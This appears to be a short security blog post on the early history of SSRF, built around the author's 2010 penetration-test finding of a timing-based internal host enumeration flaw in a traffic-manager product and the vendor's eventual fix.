A brief history of SSRF
Server-Side Request Forgery is a security issue in applications where an attacker is able to get a server to send some type of a request (these days mostly HTTP/s requests) that the server should not be able to send. This issue is the classic abuse of trust vulnerability – the server tends to sit in a “trusted” environment (e.g., DMZ, your cloud VPC, etc.) and the users of the application sit outside the trust boundary (e.g., mobile devices, cafe, home, corporate environments, API clients within and outside cloud).
A brief history
In this blog post though, I won’t be talking about all the fancy new things that have had SSRF issues – you can likely find a few hundreds of those anyway! I am going to be talking about a brief history of this issue and what happened before we gave this issue a “name” – SSRF. The earliest references to the name “SSRF” appear to come from a talk done in BlackHat US 2012, and wayback machine tells me that the CWE-918 page was authored sometime around 2013. If you look closely at the CWE-918 page though, you will find that there were old CVEs dating back to 2002, and 2004. There was a Shmoocon talk about it in 2008 too but the term SSRF was not established until 2012.
The Issue
I was working on a penetration test for a financial services firm in 2010 of a popular load balancer that offered a GTM (Global traffic manager) solution and that allowed folks to login and obtain restricted execution environments wherefrom certain applications could be exposed and that would allow remote workers or untrusted entities who you only want to expose certain applications could use. The issue was in a POST request post login and IIRC even pre-login (though my details on this are fuzzy). This might be circa 2010 timeframe and to my knowledge the issue was not issued a CVE and wasn’t associated with Knowledge base article – I may not know 100%. The guidance from the vendor was simple – update the software and move on. The issue was this – an authenticated or an unauthenticated user would send an HTTP POST request to a page with a base64 encoded parameter that included a hostname which would trigger a DNS request on the back end of the GTM site. The time it took for the response to get back would indicate whether the domain was legitimate or not. So I used the a popular dictionary and enumerate all the hostnames from that directory that were legitimate and the ones that were not sitting outside on the Internet and mapping the hosts on the internal network.
The backstory
What the vendor of the GTM software did not know was how critical this application was to the business of the customer. They seemed to be dragging their feet without updates and meanwhile the customer – a financial institution with lots at stake could not go live. The pressure mounted on the IT staff to fix the issue and the vendor while being responsive was unable to give a firm date quickly – remember this was 13-14 years ago prior to bug bounties and responsible disclosures still were quite clunky! And the customer was also advising me to push the software vendor so we could discuss. Thankfully, on the vendor side, there was a solid security person who understood the issue immediately and its impact and advised the software teams to do what was right. They made the process post authentication and they also added tokens, limits and constant time responses to fix the issue.
Fast forward
Today, obviously things are a lot better. And I wrote this blog post so the old me can look back and point to this in a meaningful way without forgetting the old experiences among the new.